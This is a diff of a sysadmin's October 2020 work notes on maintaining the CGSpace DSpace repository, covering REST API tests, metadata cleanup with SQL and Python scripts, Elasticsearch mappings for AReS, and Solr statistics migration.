    -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. <!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/solr/update] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.104</h3></body></html>
    +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. <!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/solr/update] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.104</h3></body></html>
             at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:512)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
             at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
    @@ -278,7 +278,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected m
     
     
     
    -
    $ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com 'password=fuuuu'
    +
    $ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com 'password=fuuuu'
     $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF942028AA52DFDA16DBCAFDE
     
    • Then we post an item in JSON format to /rest/collections/{uuid}/items:
    • @@ -287,25 +287,25 @@ $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF94202
    • Format of JSON is:
    -
    { "metadata": [
    +
    { "metadata": [
         {
    -      "key": "dc.title",
    -      "value": "Testing REST API post",
    -      "language": "en_US"
    +      "key": "dc.title",
    +      "value": "Testing REST API post",
    +      "language": "en_US"
         },
         {
    -      "key": "dc.contributor.author",
    -      "value": "Orth, Alan",
    -      "language": "en_US"
    +      "key": "dc.contributor.author",
    +      "value": "Orth, Alan",
    +      "language": "en_US"
         },
         {
    -      "key": "dc.date.issued",
    -      "value": "2020-09-01",
    -      "language": "en_US"
    +      "key": "dc.date.issued",
    +      "value": "2020-09-01",
    +      "language": "en_US"
         }
       ],
    -  "archived":"false",
    -  "withdrawn":"false"
    +  "archived":"false",
    +  "withdrawn":"false"
     }
     
    • What is unclear to me is the archived parameter, it seems to do nothing… perhaps it is only used for the /items endpoint when printing information about an item @@ -362,7 +362,7 @@ $ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF94202
    -
    $ http POST http://localhost:8080/rest/login email=aorth@fuuu.com 'password=ddddd'
    +
    $ http POST http://localhost:8080/rest/login email=aorth@fuuu.com 'password=ddddd'
     $ http http://localhost:8080/rest/status rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099
     $ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099 < item-object.json
     
      @@ -408,10 +408,10 @@ $ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:
    -
    $ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    -$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    -$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    -$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    +
    $ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    +$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    +$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
    +$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
     
    • After a few minutes I saw these four hits in Solr… WTF
        @@ -483,7 +483,7 @@ dspace=> COMMIT;
    -
    dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.country" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
    +
    dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.country" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
     COPY 195
     
    • Then use OpenRefine and make a new column for corrections, then use this GREL to convert to title case: value.toTitlecase() @@ -493,7 +493,7 @@ COPY 195
    • For the input forms I found out how to do a complicated search and replace in vim:
    -
    :'<,'>s/\<\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\>/\u\2\L\3/g
    +
    :'<,'>s/\<\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\>/\u\2\L\3/g
     
    • It uses a negative lookahead (aka “lookaround” in PCRE?) to match words that are not “pair”, “displayed”, etc because we don’t want to edit the XML tags themselves…
        @@ -509,14 +509,14 @@ COPY 195
    -
    dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.region" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
    +
    dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.region" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
     COPY 34
     
    • I did the same as the countries in OpenRefine for the database values and in vim for the input forms
    • After testing the replacements locally I ran them on CGSpace:
    -
    $ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
    -$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227
    +
    $ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
    +$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227
     
    • Then I started a full re-indexing:
    @@ -583,14 +583,14 @@ sys 2m22.713s dspace=> UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57; UPDATE 335063 dspace=> COMMIT; -dspace=> \COPY (SELECT DISTINCT text_value as "dc.subject", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY "dc.subject" ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER; +dspace=> \COPY (SELECT DISTINCT text_value as "dc.subject", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY "dc.subject" ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER; COPY 1500
    • Use my agrovoc-lookup.py script to validate subject terms against the AGROVOC REST API, extract matches with csvgrep, and then update and format the controlled vocabulary:
    $ csvcut -c 1 /tmp/2020-10-15-top-1500-agrovoc-subject.csv | tail -n 1500 > /tmp/subjects.txt
     $ ./agrovoc-lookup.py -i /tmp/subjects.txt -o /tmp/subjects.csv -d
    -$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed '1d' > dspace/config/controlled-vocabularies/dc-subject.xml
    +$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed '1d' > dspace/config/controlled-vocabularies/dc-subject.xml
     # apply formatting in XML file
     $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
     
      @@ -614,7 +614,7 @@ sys 2m22.713s
    • They are using the user agent “CCAFS Website Publications importer BOT” so they are getting rate limited by nginx
    • Ideally they would use the REST find-by-metadata-field endpoint, but it is really slow for large result sets (like twenty minutes!):
    -
    $ curl -f -H "CCAFS Website Publications importer BOT" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100" -d '{"key":"cg.contributor.crp", "value":"Climate Change, Agriculture and Food Security","language": "en_US"}'
    +
    $ curl -f -H "CCAFS Website Publications importer BOT" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100" -d '{"key":"cg.contributor.crp", "value":"Climate Change, Agriculture and Food Security","language": "en_US"}'
     
    • For now I will whitelist their user agent so that they can continue scraping /browse
    • I figured out that the mappings for AReS are stored in Elasticsearch @@ -624,23 +624,23 @@ sys 2m22.713s
    -
    $ curl -XPOST "localhost:9200/openrxv-values/_delete_by_query" -H 'Content-Type: application/json' -d'
    +
    $ curl -XPOST "localhost:9200/openrxv-values/_delete_by_query" -H 'Content-Type: application/json' -d'
     {
    -  "query": {
    -    "match": {
    -      "_id": "64j_THMBiwiQ-PKfCSlI"
    +  "query": {
    +    "match": {
    +      "_id": "64j_THMBiwiQ-PKfCSlI"
         }
       }
     }
     
    • I added a new find/replace:
    -
    $ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
    +
    $ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
     {
    -  "find": "ALAN1",
    -  "replace": "ALAN2",
    +  "find": "ALAN1",
    +  "replace": "ALAN2",
     }
    -'
    +'
     
    • I see it in Kibana, and I can search it in Elasticsearch, but I don’t see it in OpenRXV’s mapping values dashboard
    • Now I deleted everything in the openrxv-values index:
    • @@ -649,12 +649,12 @@ sys 2m22.713s
    • Then I tried posting it again:
    -
    $ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
    +
    $ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
     {
    -  "find": "ALAN1",
    -  "replace": "ALAN2",
    +  "find": "ALAN1",
    +  "replace": "ALAN2",
     }
    -'
    +'
     
    • But I still don’t see it in AReS
    • Interesting! I added a find/replace manually in AReS and now I see the one I POSTed…
    • @@ -683,63 +683,63 @@ sys 2m22.713s
    • Last night I learned how to POST mappings to Elasticsearch for AReS:
    $ curl -XDELETE http://localhost:9200/openrxv-values
    -$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @./mapping.json
    +$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @./mapping.json
     
    • The JSON file looks like this, with one instruction on each line:
    -
    {"index":{}}
    -{ "find": "CRP on Dryland Systems - DS", "replace": "Dryland Systems" }
    -{"index":{}}
    -{ "find": "FISH", "replace": "Fish" }
    +
    {"index":{}}
    +{ "find": "CRP on Dryland Systems - DS", "replace": "Dryland Systems" }
    +{"index":{}}
    +{ "find": "FISH", "replace": "Fish" }
     
    • Adjust the report templates on AReS based on some of Peter’s feedback
    • I wrote a quick Python script to filter and convert the old AReS mappings to Elasticsearch’s Bulk API format:
    -
    #!/usr/bin/env python3
    -
    -import json
    -import re
    -
    -f = open('/tmp/mapping.json', 'r')
    -data = json.load(f)
    -
    -# Iterate over old mapping file, which is in format "find": "replace", ie:
    -#
    -#   "alan": "ALAN"
    -#
    -# And convert to proper dictionaries for import into Elasticsearch's Bulk API:
    -#
    -#   { "find": "alan", "replace": "ALAN" }
    -#
    -for find, replace in data.items():
    -    # Skip all upper and all lower case strings because they are indicative of
    -    # some AGROVOC or other mappings we no longer want to do
    -    if find.isupper() or find.islower() or replace.isupper() or replace.islower():
    -        continue
    -
    -    # Skip replacements with acronyms like:
    -    #
    -    #   International Livestock Research Institute - ILRI
    -    #
    -    acronym_pattern = re.compile(r"[A-Z]+$")
    -    acronym_pattern_match = acronym_pattern.search(replace)
    -    if acronym_pattern_match is not None:
    -        continue
    -
    -    mapping = { "find": find, "replace": replace }
    -
    -    # Print command for Elasticsearch
    -    print('{"index":{}}')
    -    print(json.dumps(mapping))
    -
    -f.close()
    -
      +
      #!/usr/bin/env python3
      +
      +import json
      +import re
      +
      +f = open('/tmp/mapping.json', 'r')
      +data = json.load(f)
      +
      +# Iterate over old mapping file, which is in format "find": "replace", ie:
      +#
      +#   "alan": "ALAN"
      +#
      +# And convert to proper dictionaries for import into Elasticsearch's Bulk API:
      +#
      +#   { "find": "alan", "replace": "ALAN" }
      +#
      +for find, replace in data.items():
      +    # Skip all upper and all lower case strings because they are indicative of
      +    # some AGROVOC or other mappings we no longer want to do
      +    if find.isupper() or find.islower() or replace.isupper() or replace.islower():
      +        continue
      +
      +    # Skip replacements with acronyms like:
      +    #
      +    #   International Livestock Research Institute - ILRI
      +    #
      +    acronym_pattern = re.compile(r"[A-Z]+$")
      +    acronym_pattern_match = acronym_pattern.search(replace)
      +    if acronym_pattern_match is not None:
      +        continue
      +
      +    mapping = { "find": find, "replace": replace }
      +
      +    # Print command for Elasticsearch
      +    print('{"index":{}}')
      +    print(json.dumps(mapping))
      +
      +f.close()
      +
      • It filters all upper and lower case strings as well as any replacements that end in an acronym like “- ILRI”, reducing the number of mappings from around 4,000 to about 900
      • I deleted the existing openrxv-values Elasticsearch core and then POSTed it:
      $ ./convert-mapping.py > /tmp/elastic-mappings.txt
       $ curl -XDELETE http://localhost:9200/openrxv-values
      -$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elastic-mappings.txt
      +$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elastic-mappings.txt
       
      • Then in AReS I didn’t see the mappings in the dashboard until I added a new one manually, after which they all appeared
          @@ -762,12 +762,12 @@ $ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-T
        • I ran the dspace cleanup -v process on CGSpace and got an error:
        -
        Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        -  Detail: Key (bitstream_id)=(192921) is still referenced from table "bundle".
        +
        Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
        +  Detail: Key (bitstream_id)=(192921) is still referenced from table "bundle".
         
        • The solution is, as always:
        -
        $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);'
        +
        $ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);'
         UPDATE 1
         
        • After looking at the CGSpace Solr stats for 2020-10 I found some hits to purge:
        • @@ -794,8 +794,8 @@ Total number of bot hits purged: 8174
      -
      $ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
      -$ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
      +
      $ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
      +$ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
       
      • And I saw three hits in Solr with isBot: true!!!
          @@ -817,9 +817,9 @@ $ curl -s 'http://localhost:8083/solr/statistics/update?softCommit=true'
      -
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
      +
      $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m"
       $ dspace metadata-export -f /tmp/cgspace.csv
      -$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
      +$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US],cg.subject.alliancebiovciat[],cg.subject.alliancebiovciat[en_US],cg.subject.bioversity[en_US],cg.subject.ccafs[],cg.subject.ccafs[en_US],cg.subject.ciat[],cg.subject.ciat[en_US],cg.subject.cip[],cg.subject.cip[en_US],cg.subject.cpwf[en_US],cg.subject.iita,cg.subject.iita[en_US],cg.subject.iwmi[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
       
      • Then I went through all center subjects looking for “WOMEN” or “GENDER” and checking if they were missing the associated AGROVOC subject
          @@ -848,7 +848,7 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
      -
      $ http 'http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&size=10000&q=*:*' > /tmp/affiliations.json
      +
      $ http 'http://localhost:9200/openrxv-items-final/_search?_source_includes=affiliation&size=10000&q=*:*' > /tmp/affiliations.json
       
      • Then I decided to try a different approach and I adjusted my convert-mapping.py script to re-consider some replacement patterns with acronyms from the original AReS mapping.json file to hopefully address some MEL to CGSpace mappings
          @@ -897,8 +897,8 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri $ git checkout origin/6_x-dev-atmire-modules $ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false clean package $ sudo su - postgres -$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;' -$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');" +$ psql dspacetest -c 'CREATE EXTENSION pgcrypto;' +$ psql dspacetest -c "DELETE FROM schema_version WHERE version IN ('5.8.2015.12.03.3');" $ exit $ sudo systemctl stop tomcat7 $ cd dspace/target/dspace-installer @@ -911,7 +911,7 @@ $ sudo systemctl start tomcat7
      • Then I started processing the Solr stats one core and 1 million records at a time:
      -
      $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
      +
      $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
       $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
       $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
       $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
      @@ -920,8 +920,8 @@ $ chrt -b 0 dspace solr-upgrade-statistics-6x -n 1000000 -i statistics
       
      • After the fifth or so run I got this error:
      -
      Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      -org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      +
      Exception: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
      +org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field 'p_group_id{type=uuid,properties=indexed,stored,multiValued}' from value '10'
               at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
               at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
               at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
      @@ -945,7 +945,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error whil
       
    -
    $ curl -s "http://localhost:8083/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
    +
    $ curl -s "http://localhost:8083/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
     
    • Then I restarted the solr-upgrade-statistics-6x process, which apparently had no records left to process
    • I started processing the statistics-2019 core… @@ -967,8 +967,8 @@ java.lang.OutOfMemoryError: Java heap space
    -
    $ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>id:/.+-unmigrated/</query></delete>"
    -
      +
      $ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>id:/.+-unmigrated/</query></delete>"
      +
      • I restarted the process and it crashed again a few minutes later
        • I increased the memory to 4096m and tried again
        • @@ -976,7 +976,7 @@ java.lang.OutOfMemoryError: Java heap space
      -
      $ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
      +
      $ curl -s "http://localhost:8083/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
       
      • Then I started processing the statistics-2017 core…
          @@ -984,7 +984,7 @@ java.lang.OutOfMemoryError: Java heap space
      -
      $ curl -s "http://localhost:8083/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
      +
      $ curl -s "http://localhost:8083/solr/statistics-2017/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)</query></delete>"
       
      • Also I purged 2.7 million unmigrated records from the statistics-2019 core
      • I filed an issue with Atmire about the duplicate values in the owningComm and containerCommunity fields in Solr: https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=839
      • @@ -1011,7 +1011,7 @@ java.lang.OutOfMemoryError: Java heap space
      $ dspace metadata-export -f /tmp/cgspace.csv
      -$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
      +$ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri[en_US]' /tmp/cgspace.csv > /tmp/cgspace-subjects.csv
       
      • I sanity checked the CSV in csv-metadata-quality after exporting from OpenRefine, then applied the changes to 453 items on CGSpace
      • Skype with Peter and Abenet about CGSpace Explorer (AReS) @@ -1043,7 +1043,7 @@ $ csvcut -c 'id,dc.subject[],dc.subject[en_US],cg.subject.ilri[],cg.subject.ilri
        $ ./create-mappings.py > /tmp/elasticsearch-mappings.txt
         $ ./convert-mapping.py >> /tmp/elasticsearch-mappings.txt
         $ curl -XDELETE http://localhost:9200/openrxv-values
        -$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elasticsearch-mappings.txt
        +$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elasticsearch-mappings.txt
         
        • After that I had to manually create and delete a fake mapping in the AReS UI so that the mappings would show up
        • I fixed a few strings in the OpenRXV admin dashboard and then re-built the frontent container:
        • @@ -1088,16 +1088,16 @@ South Asia,Southern Asia Africa South Of Sahara,Sub-Saharan Africa North Africa,Northern Africa West Asia,Western Asia -$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d +$ ./fix-metadata-values.py -i 2020-10-28-update-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227 -d
      • Then I started a full Discovery re-indexing:
      -
      $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
      -
      -real    92m14.294s
      -user    7m59.840s
      -sys     2m22.327s
      -
        +
        $ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
        +
        +real    92m14.294s
        +user    7m59.840s
        +sys     2m22.327s
        +
        • I realized I had been using an incorrect Solr query to purge unmigrated items after processing with solr-upgrade-statistics-6x
          • Instead of this: (*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)
          • @@ -1115,17 +1115,17 @@ sys 2m22.327s
          • Send Peter a list of affiliations, authors, journals, publishers, investors, and series for correction:
          -
          dspace=> \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
          +
          dspace=> \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-affiliations.csv WITH CSV HEADER;
           COPY 6357
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.description.sponsorship", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-sponsors.csv WITH CSV HEADER;
           COPY 730
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.contributor.author", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-authors.csv WITH CSV HEADER;
           COPY 71748
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.publisher", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.publisher", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 39 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-publishers.csv WITH CSV HEADER;
           COPY 3882
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.source", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.source", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 55 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-journal-titles.csv WITH CSV HEADER;
           COPY 3684
          -dspace=> \COPY (SELECT DISTINCT text_value as "dc.relation.ispartofseries", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
          +dspace=> \COPY (SELECT DISTINCT text_value as "dc.relation.ispartofseries", count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 43 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-10-28-series.csv WITH CSV HEADER;
           COPY 5598
           
          • I noticed there are still some mapping for acronyms and other fixes that haven’t been applied, so I ran my create-mappings.py script against Elasticsearch again @@ -1134,12 +1134,12 @@ COPY 5598
        -
        $ grep -c '"find"' /tmp/elasticsearch-mappings*
        +
        $ grep -c '"find"' /tmp/elasticsearch-mappings*
         /tmp/elasticsearch-mappings2.txt:350
         /tmp/elasticsearch-mappings.txt:1228
        -$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | wc -l
        +$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | wc -l
         1578
        -$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | sort | uniq | wc -l
        +$ cat /tmp/elasticsearch-mappings* | grep -v '{"index":{}}' | sort | uniq | wc -l
         1578
         
